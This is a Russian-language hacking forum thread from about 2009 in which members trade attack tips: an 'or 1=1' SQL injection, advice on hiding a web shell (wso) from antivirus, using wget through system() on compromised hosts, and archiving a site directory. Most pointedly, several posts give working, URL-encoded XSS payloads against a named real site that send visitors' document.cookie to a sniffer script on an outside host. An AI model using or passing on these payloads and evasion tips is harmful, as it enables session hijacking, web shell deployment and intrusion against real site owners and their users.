Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    261
    Likes Received:
    440
    Reputations:
    275
    там же написано SQL инъекция
     
  2. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    там могли написать "конь в пальто".
    а я спросил
    как так может быть? и с чем это связано. как определить с какими сайтам такой трюк пройдет?
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Отвечаю, так может быть очень просто, это связано с инъекцией, пройдёт с сайтами на которых есть такая инъекция.

    Нормально так? Линки на статьи по скулям пхп и html нужны?
     
  4. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    jokester

    )) нормально! а линки думаю сам найду. просто хотел узнать: что за такая инъекция ? ))) здесь если можно - немного подорбно.
     
  5. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Обыкновенная инекция :/
    where username = '' or 1=1;
    первое условие не срабатывает,поэтому србатывает второе,заранее верное условие, 1=1.Помоему как то так.
     
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Какой прогой можно криптонуть шелл?
    штобы и код срабатывал и антивирем непалился)
     
  7. [Forest]

    [Forest] New Member

    Joined:
    7 Nov 2009
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    wso вполне нормальный и не палится
     
    1 person likes this.
  8. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Количество символов в строке ограничивается сервером - обычно это около 4096 символов.
    Но может быть ограничение и в самом скрипте.

    Функци system() работает как в unix, так и в windows, только там команды шелла разные.
    wget есть и под windows.
     
  9. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )
     
  10. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    че -то не очень верю в это ! в моем случае не работает. я спросил здесь, мне сказали, что хост блокирует. (wso)
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    http://www.google.com/search?q=windows+wget
    http://users.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget-1.10.2.exe
     
  12. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Ээ, ХП и Севен этой команды не знают, если wget не установлен. Если бы ты погуглил, ты бы увидел, что прога под вин есть, и даже есть GUI
    А вот win32 сборка Льюиса
     
  13. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>

    если будем засылть на сниффер
    типа document.location.href="http://site/sniff.php?"+document.cookie;
    то XSS не отрабатывет, убираем ? и все ок,но не то ))))

    в чем проблема?
     
  14. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    вот так работает редирект с куками
    http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.assign(%22http://ya.ru/%3F%22+document.cookie);%3C/script%3E%3C!--

    короче нужно ? заменить на %3F

    так же работает
    http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.href=%22http://site/sniff.php%3f%22+document.cookie;%3C/script%3E%3C!--
     
    #10434 AFoST, 3 Dec 2009
    Last edited: 3 Dec 2009
    1 person likes this.
  15. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    2AFoST спасибо


    И такой еще вопрос, что дает возможность записи пхп кода в сессию???
     
  16. x[0]x

    x[0]x Banned

    Joined:
    2 Dec 2008
    Messages:
    31
    Likes Received:
    5
    Reputations:
    -4
    прямая посылка изменяимых даннх (пхп кодэ) юзверя от которого ты дейсвуешь видимо :(
     
  17. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    если есть локальный инклуд - даёт возможность инклудить код и испольнить его.
     
  18. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    ок понял, жаль инклуда нету.
     
    1 person likes this.
  19. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Как каталог в линукс заархивировать? (вместе с каталогами и файлами в нем)(с командами линукса не сталкивался)
    Пробывал так:
    tar -cz -f /var/www/site/www/file.tar.gz /var/www/site2/www/

    Не пишет, т.е. архив создается но правильное заархивирование этой командой не получается

    Подскажите вообщем
     
  20. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    так необязательно архивировать через командную строку...
    можно просто правой кнопкой мышы)
     
Thread Status:
Not open for further replies.